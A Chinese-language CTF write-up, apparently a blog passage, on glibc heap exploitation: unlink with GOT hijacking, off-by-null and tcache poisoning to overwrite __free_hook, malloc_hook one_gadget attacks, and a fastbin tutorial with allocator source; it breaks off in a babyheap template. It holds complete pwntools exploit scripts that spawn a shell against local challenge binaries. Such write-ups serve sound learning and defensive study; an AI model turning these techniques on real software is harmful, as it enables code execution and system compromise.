malloc_hook=libc_base+libc.sym['__malloc_hook']
realloc = libc_base + libc.sym["__libc_realloc"]
system_libc=libc_base+libc.sym['system']
one_gadget = libc_base + 0x4527a
success('one_gadget >> '+hex(one_gadget))

add(0,0x60,p64(malloc_hook - 0x23))
add(0,0x60,p64(malloc_hook - 0x23))
add(0,0x60,p64(malloc_hook - 0x23))

add(0, 0x60, 'c' * 0xb + p64(one_gadget) + p64(realloc + 0x10))

p.sendlineafter(">> ", "1")
p.sendlineafter(">> ", str(0))
p.sendlineafter(">> ", str(0))

p.interactive()

changeable_note

64位,dynamically,开了NX,开了canary

程序有4个功能

入侵思路

“free模块”置空了指针,打不了 Double free

“修改模块”模块有堆溢出,可以打 unlink攻击

先搭好模板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def delete(index):
p.sendlineafter('>> ','3')
p.sendlineafter('index?\n>> ',str(index))

def add(index,size,content):
p.sendlineafter('>> ','1')
p.sendlineafter('index?\n>> ',str(index))
p.sendlineafter('size?\n>> ',str(size))
p.sendafter('content?\n>> ',content)

def edit(index,content):
p.sendlineafter('>> ','2')
p.sendlineafter('index?\n>> ',str(index))
p.sendline(content)

def farewell():
p.sendlineafter('>> ','4')

打unlink,需要获取目标chunk的FD指针

  • 伪造“chunk->presize”为“0”,“chunk->size”为“true_szie - 0x10”
  • 把FD伪造为“list_add - 0x18”,把BK伪造为“list_addr - 0x10”
  • 溢出到下一个chunk,修改“last_chunk->presize”为“true_szie - 0x10”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
notes_addr=0x4040C0
list_addr_chunk2=notes_addr+0x8

add(0,0xa0,'\n')
add(1,0xa0,'\n')
add(2,0xa0,'\n')
add(3,0xa0,'\n')

payload=p64(0)+p64(0xa0)
payload+=p64(list_addr_chunk2-0x18)
payload+=p64(list_addr_chunk2-0x10)
payload=payload.ljust(0xa0,'\x00')
payload+=p64(0xa0)+p64(0xb0)

edit(1,payload)
delete(2)
1
2
3
4
pwndbg> x/20xg 0x4040C0
0x4040c0 <notes>: 0x000000000200a010 0x00000000004040b0
0x4040d0 <notes+16>: 0x0000000000000000 0x000000000200a220
0x4040e0 <notes+32>: 0x0000000000000000 0x0000000000000000

unlink攻击成功了,直接打GOT劫持,顺便泄露“libc_base”

  • 劫持“free_got”为“puts”,用于泄露“libc_base”
  • 打印“__libc_start_main”,泄露“libc_base”
  • 修改“atoi”为“system”,获取shell
1
2
3
4
5
6
7
8
9
10
11
12
payload=p64(0) * 2
payload+=p64(elf.got['free']) + p64(elf.got['__libc_start_main'])
payload+=p64(elf.got['atoi'])
edit(1, payload)

edit(0, p64(elf.sym['puts'])[:-1])
delete(1)

leak_addr = u64(p.recv(6).ljust(8, '\x00'))
libc_base = leak_addr-libc.sym["__libc_start_main"]
system = libc_base + libc.sym["system"]
log.success("libc_base: " + hex(libc_base))

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *

context.log_level="debug"
p=process("./note")
elf=ELF("./note")
libc = ELF("./libc-2.23.so")

def delete(index):
p.sendlineafter('>> ','3')
p.sendlineafter('index?\n>> ',str(index))

def add(index,size,content):
p.sendlineafter('>> ','1')
p.sendlineafter('index?\n>> ',str(index))
p.sendlineafter('size?\n>> ',str(size))
p.sendafter('content?\n>> ',content)

def edit(index,content):
p.sendlineafter('>> ','2')
p.sendlineafter('index?\n>> ',str(index))
p.sendline(content)

def farewell():
p.sendlineafter('>> ','4')

#gdb.attach(p)

notes_addr=0x4040C0

add(0,0xa0,'\n')
add(1,0xa0,'\n')
add(2,0xa0,'\n')
add(3,0xa0,'\n')

list_addr_chunk2=notes_addr+0x8

payload=p64(0)+p64(0xa0)
payload+=p64(list_addr_chunk2-0x18)
payload+=p64(list_addr_chunk2-0x10)
payload=payload.ljust(0xa0,'\x00')
payload+=p64(0xa0)+p64(0xb0)

edit(1,payload)
delete(2)

payload=p64(0) * 2
payload+=p64(elf.got['free']) + p64(elf.got['__libc_start_main'])
payload+=p64(elf.got['atoi'])
edit(1, payload)

edit(0, p64(elf.sym['puts'])[:-1])
delete(1)

leak_addr = u64(p.recv(6).ljust(8, '\x00'))
libc_base = leak_addr-libc.sym["__libc_start_main"]
system = libc_base + libc.sym["system"]
log.success("libc_base: " + hex(libc_base))

edit(2, p64(system)[:-1])
p.sendlineafter(">> ", '/bin/sh\x00')

#pause()

p.interactive()

sized_note

64位,dynamically,全开

IDA分析出错,直接看汇编:

代码分析

“free模块”置空了指针,掐掉了UAF

“修改模块”中的“size”,严格遵守“malloc模块”中的“size”,视乎没有堆溢出

但是它会强行把输入结束后的下一个字节覆盖为“\x00”,这种想要中断puts的行为反而造成了off-by-null漏洞

入侵思路

先搭好模板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
def delete(index):
p.sendlineafter('>> ','3')
p.sendlineafter('index?\n>> ',str(index))

def add(index,size,content):
p.sendlineafter('>> ','1')
p.sendlineafter('index?\n>> ',str(index))
p.sendlineafter('size?\n>> ',str(size))
p.sendafter('content?\n>> ',content)

def show(index):
p.sendlineafter('>> ','2')
p.sendlineafter('index?\n>> ',str(index))

def edit(index,content):
p.sendlineafter('>> ','4')
p.sendlineafter('index?\n>> ',str(index))
p.send(content)

def farewell():
p.sendlineafter('>> ','4')

程序使用了libc 2.29,所以要先填满 Tcachebin

1
2
3
4
5
for i in range(0, 11):
add(i, 0xF8, "a"*0xF0+"b"*0x8) # 方便观察

for i in range(3, 10):
delete(i)

因为程序的“show”和“edit”都只能对allocated chunk进行操作,所以多申请两个chunk(chunk1,chunk2)

1
2
3
pwndbg> bins
tcachebins
0x100 [ 7]: 0x5635c29f0b60 —▸ 0x5635c29f0a60 —▸ 0x5635c29f0960 —▸ 0x5635c29f0860 —▸ 0x5635c29f0760 —▸ 0x5635c29f0660 —▸ 0x5635c29f0560 ◂— 0x0
1
2
3
4
5
delete(0) # chunk0进入unsortedbin,可以打leak
edit(1, 'a' * 0xF0 + p64(0x200))
delete(2)
add(0, 0x70, "\n")
add(0, 0x70, "\n")

edit(1, ‘a’ * 0xF0 + p64(0x200))执行前:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> x/20xg 0x55a67dfb3350
0x55a67dfb3350: 0x0000000000000100 0x0000000000000100 # chunk1(allocated)
0x55a67dfb3360: 0x6161616161616161 0x6161616161616161
0x55a67dfb3370: 0x6161616161616161 0x6161616161616161
0x55a67dfb3380: 0x6161616161616161 0x6161616161616161
0x55a67dfb3390: 0x6161616161616161 0x6161616161616161
0x55a67dfb33a0: 0x6161616161616161 0x6161616161616161
0x55a67dfb33b0: 0x6161616161616161 0x6161616161616161
0x55a67dfb33c0: 0x6161616161616161 0x6161616161616161
0x55a67dfb33d0: 0x6161616161616161 0x6161616161616161
0x55a67dfb33e0: 0x6161616161616161 0x6161616161616161
pwndbg>
0x55a67dfb33f0: 0x6161616161616161 0x6161616161616161
0x55a67dfb3400: 0x6161616161616161 0x6161616161616161
0x55a67dfb3410: 0x6161616161616161 0x6161616161616161
0x55a67dfb3420: 0x6161616161616161 0x6161616161616161
0x55a67dfb3430: 0x6161616161616161 0x6161616161616161
0x55a67dfb3440: 0x6161616161616161 0x6161616161616161
0x55a67dfb3450: 0x6262626262626262 0x0000000000000101 # chunk2(allocated)
0x55a67dfb3460: 0x6161616161616161 0x6161616161616161
0x55a67dfb3470: 0x6161616161616161 0x6161616161616161
0x55a67dfb3480: 0x6161616161616161 0x6161616161616161

edit(1, ‘a’ * 0xF0 + p64(0x200))执行后:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
pwndbg> x/20xg 0x561f0e5bf250
0x561f0e5bf250: 0x0000000000000000 0x0000000000000101 # chunk0(free)
0x561f0e5bf260: 0x00007f512b29eca0 0x00007f512b29eca0
0x561f0e5bf270: 0x6161616161616161 0x6161616161616161
0x561f0e5bf280: 0x6161616161616161 0x6161616161616161
0x561f0e5bf290: 0x6161616161616161 0x6161616161616161
0x561f0e5bf2a0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf2b0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf2c0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf2d0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf2e0: 0x6161616161616161 0x6161616161616161
pwndbg>
0x561f0e5bf2f0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf300: 0x6161616161616161 0x6161616161616161
0x561f0e5bf310: 0x6161616161616161 0x6161616161616161
0x561f0e5bf320: 0x6161616161616161 0x6161616161616161
0x561f0e5bf330: 0x6161616161616161 0x6161616161616161
0x561f0e5bf340: 0x6161616161616161 0x6161616161616161
0x561f0e5bf350: 0x0000000000000100 0x0000000000000100 # chunk1(allocated)
0x561f0e5bf360: 0x6161616161616161 0x6161616161616161
0x561f0e5bf370: 0x6161616161616161 0x6161616161616161
0x561f0e5bf380: 0x6161616161616161 0x6161616161616161
pwndbg>
0x561f0e5bf390: 0x6161616161616161 0x6161616161616161
0x561f0e5bf3a0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf3b0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf3c0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf3d0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf3e0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf3f0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf400: 0x6161616161616161 0x6161616161616161
0x561f0e5bf410: 0x6161616161616161 0x6161616161616161
0x561f0e5bf420: 0x6161616161616161 0x6161616161616161
pwndbg>
0x561f0e5bf430: 0x6161616161616161 0x6161616161616161
0x561f0e5bf440: 0x6161616161616161 0x6161616161616161
0x561f0e5bf450: 0x0000000000000200 0x0000000000000100 # chunk2(allocated)
0x561f0e5bf460: 0x6161616161616161 0x6161616161616161
0x561f0e5bf470: 0x6161616161616161 0x6161616161616161
0x561f0e5bf480: 0x6161616161616161 0x6161616161616161
0x561f0e5bf490: 0x6161616161616161 0x6161616161616161
0x561f0e5bf4a0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf4b0: 0x6161616161616161 0x6161616161616161
0x561f0e5bf4c0: 0x6161616161616161 0x6161616161616161

修改了chunk2的“chunk->presize”,使chunk2误以为chunk0是它相邻的上一个chunk,导致了后续释放chunk2时,“chunk0,chunk1,chunk2”三者合并进入unsortedbin

​ // 溢出的“\x00”把P位变为“0”

连续两次malloc都会在unsortedbin中申请:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> x/20xg 0x55b7be1ba250
0x55b7be1ba250: 0x0000000000000000 0x0000000000000081 # chunk0_new
0x55b7be1ba260: 0x00007f0d34c9000a 0x00007f0d34c9bf90
0x55b7be1ba270: 0x6161616161616161 0x6161616161616161
0x55b7be1ba280: 0x6161616161616161 0x6161616161616161
0x55b7be1ba290: 0x6161616161616161 0x6161616161616161
0x55b7be1ba2a0: 0x6161616161616161 0x6161616161616161
0x55b7be1ba2b0: 0x6161616161616161 0x6161616161616161
0x55b7be1ba2c0: 0x6161616161616161 0x6161616161616161
0x55b7be1ba2d0: 0x6161616161616161 0x0000000000000081 # chunk1_new
0x55b7be1ba2e0: 0x00007f0d34c9000a 0x00007f0d34c9bca0
pwndbg>
0x55b7be1ba2f0: 0x6161616161616161 0x6161616161616161
0x55b7be1ba300: 0x6161616161616161 0x6161616161616161
0x55b7be1ba310: 0x6161616161616161 0x6161616161616161
0x55b7be1ba320: 0x6161616161616161 0x6161616161616161
0x55b7be1ba330: 0x6161616161616161 0x6161616161616161
0x55b7be1ba340: 0x6161616161616161 0x6161616161616161
0x55b7be1ba350: 0x0000000000000100 0x0000000000000201 # chunk1_old(allocated)
0x55b7be1ba360: 0x00007f0d34c9bca0 0x00007f0d34c9bca0
0x55b7be1ba370: 0x6161616161616161 0x6161616161616161
0x55b7be1ba380: 0x6161616161616161 0x6161616161616161

“chunk_free”在“chunk_new”的下方,理论上,新申请的chunk都可以打印“main_arena”

但是“add”中,强行把输入结束后的下一个字节用“\x00”覆盖了,导致puts中断

连续申请两个大小为“0x80”的chunk后,chunk_free刚好与chunk1_old重合,导致“arena_main”被写入chunk1_old,而chunk1_old原本就在“list”中,可以直接打印

最后打free_hook就可以了:

1
2
3
4
5
6
add(0, 0x60, '\n') # 申请到了chunk1_old(在list中,可以直接edit)
delete(0) # 进入tcachebin
edit(1, p64(free_hook)) # edit chunk1_old
add(1, 0x60, '/bin/sh\x00')
add(2, 0x60, p64(system_libc))
delete(1)

再次申请“0x70”字节的chunk,实际上申请了chunk1_old(和chunk0_new重合),释放然后进入tcachebin,在chunk1_old中写入的“free_hook”也会进入tcachebin:

1
2
3
tcachebins
0x70 [ 1]: 0x55eda3495360 —▸ 0x7fb6d7a518e8 (__free_hook) ◂— ...
0x100 [ 7]: 0x55eda3495b60 —▸ 0x55eda3495a60 —▸ 0x55eda3495960 —▸ 0x55eda3495860 —▸ 0x55eda3495760 —▸ 0x55eda3495660 —▸ 0x55eda3495560 ◂— 0x0
  • “add(1, 0x60, ‘/bin/sh\x00’)”会申请“0x55eda3495360”
  • “add(2, 0x60, p64(system_libc))”会申请“0x7fb6d7a518e8”

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from pwn import *

p=process("./note")
elf=ELF("./note")
libc = ELF("./libc-2.27.so")

def delete(index):
p.sendlineafter('>> ','3')
p.sendlineafter('index?\n>> ',str(index))

def add(index,size,content):
p.sendlineafter('>> ','1')
p.sendlineafter('index?\n>> ',str(index))
p.sendlineafter('size?\n>> ',str(size))
p.sendafter('content?\n>> ',content)

def show(index):
p.sendlineafter('>> ','2')
p.sendlineafter('index?\n>> ',str(index))

def edit(index,content):
p.sendlineafter('>> ','4')
p.sendlineafter('index?\n>> ',str(index))
p.send(content)

def farewell():
p.sendlineafter('>> ','4')

#gdb.attach(p)

for i in range(0, 11):
add(i, 0xF8, "a"*0xF0+"b"*0x8)

for i in range(3, 10):
delete(i)

delete(0)
edit(1, 'a' * 0xF0 + p64(0x200))
delete(2)

add(0, 0x70, "\n")
add(0, 0x70, "\n")
show(1)

leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
libc_base=leak_addr-0x3ebca0
free_hook=libc_base+libc.sym['__free_hook']
system_libc=libc_base+libc.sym['system']
success("leak_addr >>"+hex(leak_addr))
success("libc_base >>"+hex(libc_base))
success("free_hook >>"+hex(free_hook))
success("system_libc >>"+hex(system_libc))

add(0, 0x60, '\n')
delete(0)
edit(1, p64(free_hook))
add(1, 0x60, '/bin/sh\x00')
add(2, 0x60, p64(system_libc))
delete(1)

#pause()

p.interactive()

Ptmalloc算法:Fastbin Attack

广义上来说,涉及到 Fastbin 的攻击都是 Fastbin Attack,这也是堆利用中的一个大类

利用方式十分灵活:Double free,House Of Spirit……都是它的分支

作用效果也多样:申请到“malloc_hook”打“one_gadget”,申请到栈上打“stackoverflow”……


Fastbin bin

Fast bin可以看着是small bins的一小部分cache ,设计初衷就是进行快速的小内存分配和释放

基础信息:

Fast bin通常有7条链表

  • 32位:16-64字节 0x10-0x40
  • 64位:32-128字节 0x20-0x80

fastbinsY 是一个数组,相同大小的 chunk 放在一个数组元素指向的链表里面

先不管 fastbin 的分配方式,主要分析释放过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#define fastbin_index(sz) ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)

static void _int_free (mstate av, mchunkptr p, int have_lock)
{
size = chunksize (p); //获取p的size
check_inuse_chunk(av, p);//检查p的物理相邻的下一个堆块的inuse位是否置1

//检查p的大小是否小于global_max_fast
if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
#if TRIM_FASTBINS
//检查p物理相邻的堆块是否是top chunk
&& (chunk_at_offset(p, size) != av->top)
#endif
)
{
//检查p的物理相邻下个堆块是否存在,且大小是否满足最小和最大要求
if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize (chunk_at_offset (p, size))
>= av->system_mem, 0))
{.......}

//对chunk的data块通过memset赋值,但是默认情况下是不进行操作
free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
//设置 malloc_state的flag
set_fastchunks(av);

//获取p对应大小的fastbinY的索引
unsigned int idx = fastbin_index(size);
//fb指向对应大小的fastbinY的地址
fb = &fastbin (av, idx);

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
// old为 对应大小的fastbinY的fd值,也就是第一个对块的地址
mchunkptr old = *fb, old2;
unsigned int old_idx = ~0u;

do
{
// Check that the top of the bin is not the record we are going to add
//检查 fastbin中对应的bin的第一项 是否 等于 p (新加入的堆块)
if (__builtin_expect (old == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}
//获取 fastbin中对应的bin的第一项的索引。
if (have_lock && old != NULL)
old_idx = fastbin_index(chunksize(old));
//让 p 的fd指向 顶部的fastbin块
p->fd = old2 = old;
}
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
//catomic_compare_and_exchange_val_rel 功能是 如果*fb等于old2,则将*fb存储为p,返回old2;
// *fb=p 也就是 让对应fastbin的fd指向 p(新加入的堆块)

//检查fastbin中对应的bin的第一项的大小是否与p(要添加的块)的大小相同。
if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
{
errstr = "invalid fastbin entry (free)";
goto errout;
}
}
}

​ // 64位中size可以在0~0xF之间浮动(“0x70”和“0x7f”属于同一个链表),32位同理

单向链表后进先出,fastbinsY 数组中每一个元素指向该链表的尾结点,尾结点在通过 fd 指针指向前一个节点

  • 插入头部(最前端)
  • 从前往后进行获取
1
2
3
4
5
free(ptr1);
free(ptr2);
free(ptr3);

fastbin: ptr3 -> ptr2 -> ptr1 // fast chunk 并不会合并

注意:

  • Fast bin是 单向链表 只有fd指针,没有bk指针
  • Fast chunk不会对其他free chunk进行合并
  • Fast bin中无论是 插入 还是 移除 fast chunk,都是对“头部”进行操作(操作FD指针),而不会对某个中间的fast chunk进行操作( 最后释放的,最先申请

通常情况下:

  • 如果chunk大小 小于“0x40(32位) / 0x80(64位)”,那么该chunk会直接存入Fast bin
  • 如果内存请求 小于“0x40(32位) / 0x80(64位)”,那么程序会优先在Fast bin中查找

Fastbin bin 合并

合并时机:

  • 情况一:在申请 large chunk 时
  • 情况二:当申请的 chunk 需要申请新的 top chunk 时
  • 情况三:free 的堆块大小大于 fastbin 中的最大 size(注意这里并不是指当前fastbin中最大 chunk 的size,而是指 fastbin 中所定义的最大 chunk 的 size,是一个固定值)

第一种情况:

在申请 large chunk 时

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
if (in_smallbin_range (nb))
// 申请的大小是否在smallbin所定义的大小中
{
idx = smallbin_index (nb);
bin = bin_at (av, idx);

if ((victim = last (bin)) != bin)
{
if (victim == 0) /* initialization check */
malloc_consolidate (av); // 初始化fastbin
else
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
{
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;

if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
}
else
// 如果不是,则会对fastbin进行合并
{
idx = largebin_index (nb);
if (have_fastchunks (av))
malloc_consolidate (av);
/* 进行合并 */
}

程序验证:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
int main(){
void *ptr1,*ptr2,*ptr3,*ptr4;
ptr1 = malloc(0x20);
ptr2 = malloc(0x20);
ptr3 = malloc(0x30); // avoid merge with top chunk
strcpy(ptr1,"aaaaaaaa");
strcpy(ptr2,"bbbbbbbb");
strcpy(ptr3,"cccccccc");
free(ptr1);
free(ptr2);
ptr4 = malloc(0x500);
}

两个 free 执行以后:

1
2
3
4
5
6
7
8
Free chunk (fastbins) | PREV_INUSE
Addr: 0x55555555b000
Size: 0x31
fd: 0x00

Free chunk (fastbins) | PREV_INUSE
Addr: 0x55555555b030
Size: 0x31

一个 malloc 执行以后:

1
2
3
4
5
Free chunk (smallbins) | PREV_INUSE
Addr: 0x55555555b000
Size: 0x61
fd: 0x7ffff7dd1bc8
bk: 0x7ffff7dd1bc8

第二种情况:

当申请的 chunk 需要申请新的 top chunk 时

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
victim = av->top;
size = chunksize (victim);

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
// 判断top chunk的size是否足够我们进行下一次的分配
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);

check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}

else if (have_fastchunks (av))
// 判断是否有fastbin的存在
{
malloc_consolidate (av);
/* 进行合并 */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}

else
{
void *p = sysmalloc (nb, av);
if (p != NULL)
alloc_perturb (p, bytes);
/* 扩展top chunk */
return p;
}

程序验证:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
int main(){
void *ptr1,*ptr2,*ptr3,*ptr4,*ptr5;
ptr1 = malloc(0x20);
ptr2 = malloc(0x20);
ptr3 = malloc(0x20f00);
ptr4 = malloc(0x30);
strcpy(ptr1,"aaaaaaaa");
strcpy(ptr2,"bbbbbbbb");
strcpy(ptr3,"cccccccc");
free(ptr1);
free(ptr2);
ptr5 = malloc(0x70);
}

申请最后一个chunk前:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Free chunk (fastbins) | PREV_INUSE
Addr: 0x55555555b000
Size: 0x31
fd: 0x00

Free chunk (fastbins) | PREV_INUSE
Addr: 0x55555555b030
Size: 0x31
fd: 0x55555555b000

Allocated chunk | PREV_INUSE
Addr: 0x55555555b060
Size: 0x20f11

Allocated chunk | PREV_INUSE
Addr: 0x55555557bf70
Size: 0x41

Top chunk | PREV_INUSE
Addr: 0x55555557bfb0
Size: 0x51

申请最后一个chunk后:

1
2
3
4
5
Free chunk (smallbins) | PREV_INUSE
Addr: 0x55555555b000
Size: 0x61
fd: 0x7ffff7dd1bc8
bk: 0x7ffff7dd1bc8

第三种情况:

在 free(chunk) 的时候,如果 chunk 的大小大于 fastbin 中所定义的最大堆块的大小,则进行合并

1
2
3
if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
if (have_fastchunks(av))
malloc_consolidate(av);

程序验证:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
int main(){
void *ptr1,*ptr2,*ptr3,*ptr4;
ptr1 = malloc(0x70);
ptr2 = malloc(0x70);
ptr3 = malloc(0x70); // avoid merge with top chunk
ptr4 = malloc(0x100);
strcpy(ptr1,"aaaaaaaa");
strcpy(ptr2,"bbbbbbbb");
strcpy(ptr3,"cccccccc");
free(ptr1);
free(ptr2);
free(ptr4);
}

free(ptr4) 执行前:

1
2
3
4
5
6
7
8
9
10
pwndbg> heap
Free chunk (fastbins) | PREV_INUSE
Addr: 0x55555555b000
Size: 0x81
fd: 0x00

Free chunk (fastbins) | PREV_INUSE
Addr: 0x55555555b080
Size: 0x81
fd: 0x55555555b000

free(ptr4) 执行后:

1
2
3
4
5
Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x55555555b000
Size: 0x101
fd: 0x7ffff7dd1b78
bk: 0x7ffff7dd1b78

合并过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
static void malloc_consolidate(mstate av)
{
mfastbinptr* fb; /* current fastbin being consolidated */
mfastbinptr* maxfb; /* last fastbin (for loop control) */
mchunkptr p; /* current chunk being consolidated */
mchunkptr nextp; /* next chunk to consolidate */
mchunkptr unsorted_bin; /* bin header */
mchunkptr first_unsorted; /* chunk to link to */

/* These have same use as in free() */
mchunkptr nextchunk;
INTERNAL_SIZE_T size;
INTERNAL_SIZE_T nextsize;
INTERNAL_SIZE_T prevsize;
int nextinuse;
mchunkptr bck;
mchunkptr fwd;

/*
If max_fast is 0, we know that av hasn't
yet been initialized, in which case do so below
*/

if (get_max_fast () != 0) {
(av);

unsorted_bin = unsorted_chunks(av);

maxfb = &fastbin (av, NFASTBINS - 1);
fb = &fastbin (av, 0);
do {
p = atomic_exchange_acq (fb, 0);
if (p != 0) {
do {
check_inuse_chunk(av, p);
nextp = p->fd;

/* Slightly streamlined version of consolidation code in free() */
size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
nextchunk = chunk_at_offset(p, size);
nextsize = chunksize(nextchunk);

if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(av, p, bck, fwd);
}

if (nextchunk != av->top) {
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

if (!nextinuse) {
size += nextsize;
unlink(av, nextchunk, bck, fwd);
} else
clear_inuse_bit_at_offset(nextchunk, 0);

first_unsorted = unsorted_bin->fd;
unsorted_bin->fd = p;
first_unsorted->bk = p;

if (!in_smallbin_range (size)) {
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}

set_head(p, size | PREV_INUSE);
p->bk = unsorted_bin;
p->fd = first_unsorted;
set_foot(p, size);
}

else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
}

} while ( (p = nextp) != 0);

}
} while (fb++ != maxfb);
}
else {
malloc_init_state(av);
check_malloc_state(av);
}
}
  • 首先将与该块相邻的下一块的PREV_INUSE置为 1
  • 如果相邻的上一块未被占用,则合并,再判断相邻的下一块是否被占用,若未被占用,则合并
  • 不管是否完成合并,都会把 fastbin 或者完成合并以后的 bin 放到 unsortbin 中(如果与 top chunk 相邻,则合并到 top chunk 中)

Fastbin bin Attack

最简单的 fastbin attack 就是 double free:

1
2
3
free(chunk1);
free(chunk2);
free(chunk1);
1
2
3
4
5
6
7
8
9
pwndbg> bins
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x562efbf8d120 —▸ 0x562efbf8d170 ◂— 0x562efbf8d120
0x60: 0x0
0x70: 0x0
0x80: 0x0
  • 这样可以将同一个 chunk 申请两次,就有机会修改 free chunk

但常规的 fastbin 在申请的时候有一个检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
if (victim != 0)
{
if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
{
errstr = "malloc(): memory corruption (fast)";
errout:
malloc_printerr (check_action, errstr, chunk2mem (victim), av);
return NULL;
}
check_remalloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
  • 检查目标 fast chunk->size 是否符合 fast bin 规定的 size

这个检查需要我们格外伪造一个 chunk->size,通常有如下的处理方法:

  • 尝试在 free_hook + xxx 的地方错位申请一个 chunk,利用 free_hook 前面的 libc 地址,将其高位的 \x7f 当做 chunk->size
  • 使用 House Of Storm 的思路,利用 largebin attack 往目标地址附加错位写一个堆地址,将堆地址高位的 \x56 当做 chunk->size(堆头部地址只可能是 0x55 或者 0x56 )
  • 首先完成 double free,并往 fast chunk->fd 中写入 chunk->size,当程序把 fastbin 中的 chunk 申请到只剩下 chunk->size 时停止,此时 chunk->size 会被写入 main_arena 中,然后再次 double free 劫持 main_arena 进而劫持 top chunk(PS:劫持 top chunk 后就优先打 malloc_hook,将 malloc_hook 前面的 libc 地址给当成是 top chunk->size)

这道题目可以说是经典中的经典,堆溢出,Fastbin,Unsortedbin,malloc_hook……这些heap常见技术都涉及到了,完成这道题目,受益匪浅

babyheap

1643275729514

循环输入

1643275751088

1643275759522

64位,dynamically,全开

1643275717246

程序共有5个功能:

  • 1.allocate:输入“size”,申请“chunk”
  • 2.fill:输入“index”,输入“size”,输入“content”,向“chunk”填写数据
  • 3.free_chunk:输入“index”,释放“chunk”
  • 4.dump:输入“index”,打印“chunk”
  • 5.exit:退出程序

入侵思路

先搭好框架:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def allocate(size):
p.recvuntil('Command: ')
p.sendline('1')
